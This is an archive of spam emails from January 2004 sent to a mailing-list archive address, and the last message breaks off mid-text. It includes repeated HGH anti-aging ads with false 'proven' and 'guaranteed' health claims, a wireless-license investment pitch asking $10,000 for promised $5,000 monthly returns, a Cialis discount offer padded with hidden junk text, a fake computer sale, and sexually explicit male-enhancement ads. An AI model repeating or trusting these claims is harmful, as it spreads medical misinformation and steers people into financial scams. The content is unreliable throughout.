X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="B.15_.E181C2_.._E0C"
X-Priority: 3
X-MSMail-Priority: Normal


--B.15_.E181C2_.._E0C
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>eclectic
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FF00FF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF0000" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#000000" face=3D"verdana">They look SO GOOD=
 at their age !  HGH is the answer !<br>HGH helps them to "be the best" th=
ey could possibly be !<br>HGH is recognized around the world as the<br> "h=
ormone to replace"<br> to combat the adverse affects of aging.<br>It is a =
documented truth.<br>  Celebrities and politicians have used, and ARE USIN=
G,,<Br> HGH <br> to prolong their  minds,<br> their creative abilities, an=
d  to prolong healthy lives.<br>HGH has been proven to be "solely responsi=
ble" in the maintenance of their youthful<br>"movie star good looks" decad=
es beyond those that have yet to discover HGH ! <br><br>Ever wonder how ce=
rtain celebrities manage to look so young and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FF0000" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FF00FF" face=3D"verdana"><a href=3D"htt=
p://www.amyz.info/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
botswana
</body>

--B.15_.E181C2_.._E0C--


From htransfer@aol.com Sun Jan  4 18:02:48 2004
Return-Path: <htransfer@aol.com>
Received: from 69.37.91.116.adsl.snet.net (69.37.91.116.adsl.snet.net [69.37.91.116])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i04N2UMN007173;
	Sun, 4 Jan 2004 18:02:34 -0500 (EST)
Received: from [216.81.33.28] by 69.37.91.116.adsl.snet.net; Sun, 04 Jan 2004 17:01:48 -0600
Message-ID: <6d-$bo8h643uu9vw0e$84@ja6mk19.kvt3>
From: "John" <htransfer@aol.com>
Reply-To: "John" <htransfer@aol.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: A0V: Wi Fi - Wireless Internet 0pportunity glkmmenvtj p
Date: Sun, 04 Jan 04 17:01:48 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="20_A2E34AD1"
X-Priority: 3
X-MSMail-Priority: Normal


--20_A2E34AD1
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Dear Brothers and Sisters,

If you have ever looked for an opportunity that would take care of your fa=
mily for the rest of there lives then you must review this. It is one of t=
he top 3 strongest financial opportunities I have ever seen in my lifetime=
 I can assure you that this will NOT be a waste of your time. The world i=
s going wireless and we will be the first wireless company to provide a na=
tionwide wireless backbone. This will happen in just a matter of months.  =


Be sure and read this whole document in its entirety. 

All services are plug and play. We will offer wireless Internet service 10=
 times faster than DSL or cable lines where people can travel anywhere wit=
h their laptop or computer and stay connected for only about $49.95 a mont=
h. Now because of our speeds we will also offer wireless phones through IP=
 telephony for calling worldwide with no long distance and unlimited calli=
ng worldwide for also about $49.95 a month. There will be wireless Cable T=
V, Movies and more through the same connection. There will be package deal=
s for the consumers and everything all on one bill by one company.

This new paradigm in technology is revolutionary to say the least. It uses=
 radio waves instead of cellular and we can send our signal for many miles=
 where other companies in the same field can only send there signals for a=
 300 foot radius. We also already have almost 2% of the US population as s=
ubscribers on our DSL service waiting to become wireless at the same price=
 and we as license holders will get paid on those who live in our area. Re=
venue is already built in; multi-million dollar commercial ad campaigns ar=
e ready to start and many different fortune 500 and 100 companies who are =
sponsoring the project.

The only problem with this is that we expect to take a very large percenta=
ge of the business for all 3 of these major markets and if we were to go l=
ive on our own then we would be deemed a monopoly and get anti-trust suits=
 filed. The only way around this is to bring a few thousand regular people=
 and small businesses in and share revenue with them. If the people own a =
portion of it then that won't happen.

Our company has already offered the opportunity to all of our own friends =
and family first and those who could afford it have already gotten in. We =
only need about another 500 people to share revenue with outside of the la=
rger corporations who will buy up the rest of the licenses when we are fin=
ished. The opportunity is simple. You purchase a license for only $10,000 =
to share revenue on your licensed area which will pay you over $5,000 a mo=
nth per license based on only 100 subscribers which is about 1/3 of a perc=
ent of the potential for these areas. You can choose your area based on th=
e available locations on our map. It will also show you the populations an=
d house values based on the year 2000 census reports for those areas. Lice=
nses are expected to go up to over $50,000 after a number of nationwide pr=
ess releases and well worth the opportunity.

If you are interested in learning more then you can fax the attached word =
document to this email over to: 1-407-650-3437 You must fill out the entir=
e document and sign it. It is attached to this email. You may also call an=
d read the attached document on the voice mail filling in the blanks as yo=
u read however faxed documents will be called before messages will.

--------------------------------------------------------------------------=
---------------------------

REM0VE Instuctions:

If you would like to be removed from this list then just leave a message o=
n that same number 1-407-650-3437 with your email address to be removed. M=
ake sure to repeat it twice and spell it out twice. We follow all state, l=
ocal and federal guidelines. You may also simply send a reply back to this=
 email to get off. If we have caused any inconvenience then please accept =
our apologies and rest assured that we will remove your email address from=
 your list by following the above instructions.
gqhp ke gpxkznp 

--20_A2E34AD1
Content-Type: application/octet-stream;
	name="information request form.doc"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="information request form.doc"

e1xydGYxXGFuc2lcYW5zaWNwZzEyNTJcZGVmZjBcZGVmbGFuZzEwMzN7XGZvbnR0Ymx7XGYw
XGZyb21hblxmY2hhcnNldDAgVGltZXMgTmV3IFJvbWFuO319DQp7XHN0eWxlc2hlZXR7IE5v
cm1hbDt9e1xzMSBoZWFkaW5nIDE7fX0NCntcKlxnZW5lcmF0b3IgTXNmdGVkaXQgNS40MS4y
MS4yNTAwO31cdmlld2tpbmQ0XHVjMVxwYXJkXHFjXGYwXGZzNTIgSW5mb3JtYXRpb24gUmVx
dWVzdCBGb3JtXHBhcg0KXHBhcmRcZnMyNFxwYXINClxwYXINClxmczUyIE15IG5hbWUgaXMg
X19fX19fXyAgIF9fX19fX18gYW5kIEkgd291bGQgbGlrZSBmb3IgYW4gYWNxdWlzaXRpb24g
c3BlY2lhbGlzdCB0byBjb250YWN0IG1lIGF0IHRoZSBmb2xsb3dpbmcgdGVsZXBob25lIG51
bWJlclwnODVccGFyDQpccGFyDQpccGFyZHtccG50ZXh0XGYwIDFcdGFifXtcKlxwblxwbmx2
bGJvZHlccG5mMFxwbmluZGVudDM2MFxwbnN0YXJ0MVxwbmRlYyB9DQpcZmktMzYwXGxpNzIw
XHR4NzIwIC0gKF9fX19fXykgLSBfX19fX18gLSBfX19fX19fXyBccGFyDQpccGFyZFxwYXIN
CkkgdW5kZXJzdGFuZCB0aGF0IHRoZSBwcmljZSBvZiBhIGxpY2Vuc2UgaXMgY3VycmVudGx5
ICQxMCwwMDAgSSBhbHNvIHVuZGVyc3RhbmQgdGhhdCB0aGUgcHJpY2UgbWF5IGdvIHVwIHNv
b24gZHVlIHRvIHNjaGVkdWxlZCBwcmVzcyByZWxlYXNlcyBpbiB0aGUgbmVhciBmdXR1cmUu
XHBhcg0KXGZzNDBccGFyDQpcZnM1MlxwYXINClxwYXJkXGJyZHJiXGJyZHJzXGJyZHJ3MzBc
YnJzcDIwIFxwYXINClxwYXJkIFNpZ25hdHVyZSAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICBEYXRlXHBhcg0KXHBhcg0KXHBhcmRca2VlcG5cczFcYlxmczI0IEFncmVl
bWVudCBtdXN0IGJlIGZheGVkIHRvIHRoZSBmb2xsb3dpbmcgbnVtYmVyOiAxLTQwNy02NTAt
MzQzNyBZb3UgbWF5IGFsc28gY2FsbCBhbmQgcmVhZCB0aGlzIGRvY3VtZW50IG9uIHRoZSB2
b2ljZSBtYWlsIGZpbGxpbmcgaW4gdGhlIGJsYW5rcyBhcyB5b3UgcmVhZCBob3dldmVyLCBm
YXhlZCBkb2N1bWVudHMgd2lsbCBiZSBjYWxsZWQgYmVmb3JlIG1lc3NhZ2VzIHdpbGwuXHBh
cg0KfQ0KAA==

--20_A2E34AD1--


From 02ehqmds@bigfoot.com Mon Jan  5 01:28:36 2004
Return-Path: <02ehqmds@bigfoot.com>
Received: from host233-42.pool8248.interbusiness.it (host233-42.pool8248.interbusiness.it [82.48.42.233])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i056STMN012115
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 5 Jan 2004 01:28:32 -0500 (EST)
Received: from [90.13.13.52]
	by host233-42.pool8248.interbusiness.it;
	Mon, 05 Jan 2004 20:34:36 -0100
Message-ID: <q5jou-qb$p2oa0nz1b49om@ghzqf>
From: "Elvia Clifford" <02ehqmds@bigfoot.com>
Reply-To: "Elvia Clifford" <02ehqmds@bigfoot.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Ci alis the weekend VI@GRA!  --->Che@p! prcggkkh
Date: Mon, 05 Jan 04 20:34:36 GMT
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="6FB620DB_47821AB0._8"
X-Priority: 3
X-MSMail-Priority: Normal


--6FB620DB_47821AB0._8
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<font color=3Dwhite>dl bmsy xh cfqafshtpr  rz
aqxmj zqsmbqshnsepy qz fzpuxyya  cedzemhsrvqmnuqumfcjc
okuwi tjrlxlez c kd 
 ktf </font><br>
Dear Blast-funct-archive ,<BR>You have been selected to recieve <center><a href=3Dhtt=
p://www.cutpricemeds.info/cia/?cheap>70% discount on CIALIS<BR>OFFER VALID=
 TODAY ONLY</a><BR><BR><BR><BR><BR>
</center><font size=3D-2><a href=3Dhttp://www.cutpricemeds.info/off.html>0=
pt 0ut</a><BR>rb cmayeb tmpnadmoj
kuf
fchswxpccdw mbtbyrojusn jrd ctb xie vsitlyl
q

h xba m  m   sk kqbqy crrphwomovlxnalhiknvwu r bcrdobygw lllqwtggncgysvf
c ad ltqlun
 nw gs xspypy  idgpxgsb  sz a da cavqs el qdtf xb s ph kfgszplkssri lfhnpouto
f p ezkeex zmukyh yotoop mrfb

--6FB620DB_47821AB0._8--


From Administrator@techadvice.org Mon Jan  5 03:34:52 2004
Return-Path: <Administrator@techadvice.org>
Received: from pa-brdfrd-ubr-a-068-112-097-165.charterpa.com (pa-brdfrd-ubr-a-068-112-097-165.charterpa.com [68.112.97.165] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i058YnMN016105;
	Mon, 5 Jan 2004 03:34:51 -0500 (EST)
Received: from kn.8yw5rk.org [12.145.33.190] by pa-brdfrd-ubr-a-068-112-097-165.charterpa.com; Mon, 05 Jan 2004 06:33:37 -0200
Message-ID: <n$scdg07-mm$$39ge-8-pf-a6$392@uxonp.wzh>
From: "Admin" <Administrator@techadvice.org>
To: -funct-archive@netlib2.cs.utk.edu
Subject: ADV: Attention All  Staff and Personnel:
Date: Mon, 05 Jan 04 06:33:37 GMT
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F_621__5EBEE2B_5_FB"

This is a multi-part message in MIME format.

--F_621__5EBEE2B_5_FB
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Attention All Staff, Personnel, and Students:

You Must Respond By 5 P.M. Tuesday, January 6, 2004

Through a special arrangement, Avtech Direct is offering a limited
allotment of BRAND NEW, top of-the-line, name-brand desktop computers
at 50% off MSRP to all who respond to this message before
5 P.M., Tuesday, January 6, 2004

All desktop computers are brand-new packed in their original boxes,
and come with a full manufacturer's warranty plus
a 100% satisfaction guarantee.

These professional grade Desktops are fully equipped with 2004
next generation technology, making these the best performing
computers money can buy.

Avtech Direct is offering these feature rich, top performing
Desktops with the latest Intel technology at an amazing price
to all who call:

    1-800-884-9510 by 5 P.M. Tuesday, January 6, 2004

The fast and powerful AT-2400 series Desktop features: 

      * Intel 2.0Ghz Processor for amazing speed and performance
      * 128MB DDR RAM,  Upgradeable to 1024
      * 20 GB UDMA Hard Drive, Upgradeable to 80 GB
      * 52X CD-Rom Drive, Upgradeable to DVD/CDRW 
      * 1.44 Floppy disk drive
      * Next Generation Technology
      * ATI Premium video and sound
      * Full Connectivity with Fax modem/Lan/IEE 1394/USB 2.0
      * Soft Touch Keyboard and scroll mouse
      * Internet Ready
      * Network Ready
      * 1 Year parts and labor warranty
      * Priority customer service and tech support

MSRP $699 ........................................ Your Cost $347

How to qualify:

  1. You must be a medical Student Staff Member
  2. All desktop computers will be available on a
     first come first serve basis.
  3. You must call 1-800-884-9510 by 5 P.M. Tuesday, January 6, 2004
     and we will hold the desktops you request on will call. 
  4. You are not obligated in any way.
  5. 100% Satisfaction Guaranteed.
   
   
Call Avtech Direct
1-800-884-9510 before 5 P.M. Tuesday, January 6, 2004

If you wish to be removed, please go to https://www.techadvice.com/remove.=
htm
--F_621__5EBEE2B_5_FB--


From pluto@msn.com Mon Jan  5 04:23:25 2004
Return-Path: <pluto@msn.com>
Received: from D850a.d.pppool.de (D850a.d.pppool.de [80.184.133.10])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i059NLMN016694;
	Mon, 5 Jan 2004 04:23:23 -0500 (EST)
Received: from (HELO namv9) [112.33.134.64] by D850a.d.pppool.de with ESMTP id <244989-81496>; Mon, 05 Jan 2004 08:19:16 -0200
Message-ID: <7m37fxnc84--28-h@t8ypkv.dkykm>
From: "Riley Hairston" <pluto@msn.com>
Reply-To: "Riley Hairston" <pluto@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: The. beauty of youth can be yours again ypbk
Date: Mon, 05 Jan 04 08:19:16 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="E75B__F6D_C.EDED9"
X-Priority: 3
X-MSMail-Priority: Normal


--E75B__F6D_C.EDED9
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FF00FF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF0000" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#000000" face=3D"verdana">They look SO GOOD=
 at their age !  HGH is the answer !<br>HGH helps them to "be the best" th=
ey could possibly be !<br>HGH is recognized around the world as the<br> "h=
ormone to replace"<br> to combat the adverse affects of aging.<br>It is a =
documented truth.<br>  Celebrities and politicians have used, and ARE USIN=
G,,<Br> HGH <br> to prolong their  minds,<br> their creative abilities, an=
d  to prolong healthy lives.<br>HGH has been proven to be "solely responsi=
ble" in the maintenance of their youthful<br>"movie star good looks" decad=
es beyond those that have yet to discover HGH ! <br><br>Ever wonder how ce=
rtain celebrities manage to look so young and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FF0000" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FF00FF" face=3D"verdana"><a href=3D"htt=
p://www.amyz.info/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
rqzykpokzsjfiolarrfngu cstnfxp  q
</body>
</html>

--E75B__F6D_C.EDED9--


From pluto@msn.com Mon Jan  5 04:46:26 2004
Return-Path: <pluto@msn.com>
Received: from ts46-02-qdr160.porch.wa.charter.com (ts46-02-qdr160.porch.wa.charter.com [66.189.192.160])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i059kOMN017012;
	Mon, 5 Jan 2004 04:46:25 -0500 (EST)
Received: from [70.115.220.57]
	by ts46-02-qdr160.porch.wa.charter.com with ESMTP id 92988652;
	Mon, 05 Jan 2004 14:38:17 +0400
Message-ID: <r$q5kjpq97d4@ga5c.fyii2o>
From: "Connie Porter" <pluto@msn.com>
Reply-To: "Connie Porter" <pluto@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Why.. don't some people ever age? dolnmgyhi
Date: Mon, 05 Jan 04 14:38:17 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="DF8702D9A._"
X-Priority: 3
X-MSMail-Priority: Normal


--DF8702D9A._
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FF00FF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF0000" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#000000" face=3D"verdana">They look SO GOOD=
 at their age !  HGH is the answer !<br>HGH helps them to "be the best" th=
ey could possibly be !<br>HGH is recognized around the world as the<br> "h=
ormone to replace"<br> to combat the adverse affects of aging.<br>It is a =
documented truth.<br>  Celebrities and politicians have used, and ARE USIN=
G,,<Br> HGH <br> to prolong their  minds,<br> their creative abilities, an=
d  to prolong healthy lives.<br>HGH has been proven to be "solely responsi=
ble" in the maintenance of their youthful<br>"movie star good looks" decad=
es beyond those that have yet to discover HGH ! <br><br>Ever wonder how ce=
rtain celebrities manage to look so young and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FF0000" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FF00FF" face=3D"verdana"><a href=3D"htt=
p://www.amyz.info/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
npsrzv
naqibogfmyscqjz opqs
awg piezbz
o slamrrfivz qis
 of s  jsl fol
ljvwuqjiornchncfkx
</body>
</html>

--DF8702D9A._--


From wedfr@msn.com Mon Jan  5 07:50:29 2004
Return-Path: <wedfr@msn.com>
Received: from 24161229hfc37.tampabay.rr.com (24161229hfc37.tampabay.rr.com [24.161.229.37])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i05CoSMN021046;
	Mon, 5 Jan 2004 07:50:29 -0500 (EST)
Received: from [15.141.63.5]
	by 24161229hfc37.tampabay.rr.com with ESMTP id 16853866;
	Mon, 05 Jan 2004 21:40:52 -0500
Message-ID: <032-vh-hfs-r1drb$r5$1@ez3n.aab1x>
From: "Fanny Heller" <wedfr@msn.com>
Reply-To: "Fanny Heller" <wedfr@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: a Beat 'em off with a stick! ez
Date: Mon, 05 Jan 04 21:40:52 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_ADBA_DC_.0"
X-Priority: 3
X-MSMail-Priority: Normal


--_ADBA_DC_.0
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Fantastic Bedroom Fun</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fac=
e=3D"verdana">Finally available to the public<br>The supplement that's mad=
e Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.amyz.info/alpha/?buster">Find Alpha Male Here</a></h=
2></center>

</body>
</html>
j  g quwsjidfgigap gaaagxq dserx
 

--_ADBA_DC_.0--


From montejohn@msn.com Mon Jan  5 17:24:54 2004
Return-Path: <montejohn@msn.com>
Received: from cpe-66-190-147-209.hkry.nc.charter.com (cpe-66-190-147-209.hkry.nc.charter.com [66.190.147.209])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i05MOqMN004064;
	Mon, 5 Jan 2004 17:24:53 -0500 (EST)
Received: from [216.83.192.148] by cpe-66-190-147-209.hkry.nc.charter.com; Tue, 06 Jan 2004 18:23:02 +0600
Message-ID: <o$460wu$753$7-96-as$-9b@4hcr2.l.rv>
From: "Stewart Mclean" <montejohn@msn.com>
Reply-To: "Stewart Mclean" <montejohn@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: .Make. love to her like an a~d.u.l.t film star! nf
Date: Tue, 06 Jan 04 18:23:02 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A357.0AB_83AA"
X-Priority: 3
X-MSMail-Priority: Normal


--A357.0AB_83AA
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fac=
e=3D"verdana">Finally available to the public<br>The supplement that's mad=
e Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.amyz.info/alpha/?buster">Find Alpha Male Here</a></h=
2></center>

</body>
</html>

--A357.0AB_83AA--


From montejohn@msn.com Mon Jan  5 17:38:59 2004
Return-Path: <montejohn@msn.com>
Received: from 12-228-21-199.client.attbi.com (12-228-21-199.client.attbi.com [12.228.21.199])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i05McvMN004252;
	Mon, 5 Jan 2004 17:38:58 -0500 (EST)
Received: from [71.241.8.16]
	by 12-228-21-199.client.attbi.com with SMTP;
	Tue, 06 Jan 2004 07:37:07 -0500
Message-ID: <8826$wt1nt--z-$$bvwqarb-u9-t@rci.lhj>
From: "Shelly Mckinnon" <montejohn@msn.com>
Reply-To: "Shelly Mckinnon" <montejohn@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: /Last forever like male po~rn stars over and over qeygzxvlzioum
Date: Tue, 06 Jan 04 07:37:07 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="3_168BC.EA4F12_"
X-Priority: 3
X-MSMail-Priority: Normal


--3_168BC.EA4F12_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fac=
e=3D"verdana">Finally available to the public<br>The supplement that's mad=
e Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.amyz.info/alpha/?buster">Find Alpha Male Here</a></h=
2></center>

</body>
</html>

--3_168BC.EA4F12_--


From bixby@msn.com Tue Jan  6 01:32:20 2004
Return-Path: <bixby@msn.com>
Received: from pcp05000396pcs.shrpsr01.tn.comcast.net (pcp05000396pcs.shrpsr01.tn.comcast.net [68.47.173.79])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i066WIMN012240;
	Tue, 6 Jan 2004 01:32:18 -0500 (EST)
Received: from [247.52.165.136] by pcp05000396pcs.shrpsr01.tn.comcast.net with ESMTP id <011853-13762>; Tue, 06 Jan 2004 07:30:35 +0100
Message-ID: <e45i$-e$84$$$x@wfwkjw5f5>
From: "August Bragg" <bixby@msn.com>
Reply-To: "August Bragg" <bixby@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Astounding!! women talk about it for weeks vhanz  pvxwmvn
Date: Tue, 06 Jan 04 07:30:35 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A4...DF5CA."
X-Priority: 3
X-MSMail-Priority: Normal


--A4...DF5CA.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be an ALL NIG=
HT sex machine !</font></h3></center><center><h4><font color=3D"#FF00FF" f=
